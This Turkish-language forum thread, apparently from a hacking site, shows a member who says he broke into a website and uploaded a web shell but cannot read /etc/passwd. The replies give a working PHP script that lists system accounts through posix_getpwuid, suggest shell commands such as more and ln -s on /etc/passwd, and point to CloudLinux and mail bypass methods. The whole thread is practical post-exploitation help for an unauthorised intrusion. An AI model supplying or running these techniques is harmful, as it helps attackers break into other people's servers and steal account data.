/etc/passwd okuyamıyorum

WorthLess

Arkadaşlar siteye girdim shell attım /etc/passwd okuyamıyorum ne yapmam gerek webroot shell yükledim /etc/passwd bölümü boş.

Arkadaşlar siteye girdim shell attım /etc/passwd okuyamıyorum ne yapmam gerek webroot shell yükledim /etc/passwd bölümü boş.
 
C1 cekmeyi dene olmaz ise cloudlinux bypassla readme yap etc/paswd okunur büyük ihtimalle.
 
Böyle durumlarda genelde posix_getpwuid fonksiyonu işi halleder.

kullanım: site.com/bypass.php?id=passwd

PHP: 
<?php
if ($_GET[id]=="passwd"){
for($uid=0;$uid<2000;$uid++){ //cat /etc/passwd
$nothing = posix_getpwuid($uid);
if (!empty($nothing)) {
while (list ($key, $val) = each($nothing)){
print "$val:";
}
print "<br />";
}
}
}
?>
 
genel olarak bi çok script cat komutuyla geçer ve çoğu firma optimize yaparken bu komutları engeller sw geçme işi düşünme işidir sadece çekebilceğiniz 5-6 komut mevcut cgi shell açılıyorsa more less vs teker teker dene olmazsa bu sener yine cgi shellden more /etc/passwd > pw.txt olarak ln -s /etc/passwd > pw.txt olarak sürekli dene illaki gelir eğer gene olmadıysa shell üzerinden dizine gir litespeed yoksa girer yani direk shell den /etc gir passwd bulup edit bas gene okunur eğer cloud linux değilse.

eğer sunucu cloud linux ise mail bypass method ile çekebilirsin bunuda videolu eğitim seti olarak öncesinde forumda paylaşmıştım.
http://spyhackerz.com/forum/threads/orta-halli-videolu-eğitim-seti-1.3735/
bir sürü yolu var illaki çekersin çünkü her userin passwd dosyasında yetkisi ve hakkı vardır o passwd ya seve seve ya s*ke s*ke gelecek :D zamanında optimizasyon yaptıgımda baya uğraşıyordum engellemek için :)
 
Mectruy' Alıntı:
Böyle durumlarda genelde posix_getpwuid fonksiyonu işi halleder.

kullanım: site.com/bypass.php?id=passwd

PHP: 
<?php
if ($_GET[id]=="passwd"){
for($uid=0;$uid<2000;$uid++){ //cat /etc/passwd
$nothing = posix_getpwuid($uid);
if (!empty($nothing)) {
while (list ($key, $val) = each($nothing)){
print "$val:";
}
print "<br />";
}
}
}
?>
Genişletmek için tıklayın ...
o_O
 
Yanıt için giriş yapmanız veya üye olmanız gerekir.
131,729Konular
3,270,762Mesajlar
316,023Kullanıcılar
pristonSon Üye

About Us & Legal Notice

Yasal Uyarı: spyhackerz.org, 5651 sayılı Kanun kapsamında “Yer Sağlayıcı”dır. Sitedeki içerikler, X, Instagram ve Facebook’ta olduğu gibi, ön onay olmadan tamamen kullanıcılar tarafından paylaşılır. Bu nedenle spyhackerz.org, kullanıcı içeriklerini veya hukuka aykırı paylaşımları izlemek, denetlemek ve araştırmakla yükümlü değildir. Site bünyesinde herhangi bir “saldırı ekibi” bulunmamaktadır ve Türkiye’deki internet sitelerine yönelik zararlı faaliyet yürütülmez. SPYHACKERZ, üyelerin bireysel olarak gerçekleştirdiği hacking içerikli forum faaliyetlerinden sorumlu değildir. spyhackerz.org adı kullanılarak bir saldırı yapılması halinde tüm sorumluluk yalnızca ilgili üyeye aittir.
Üst Alt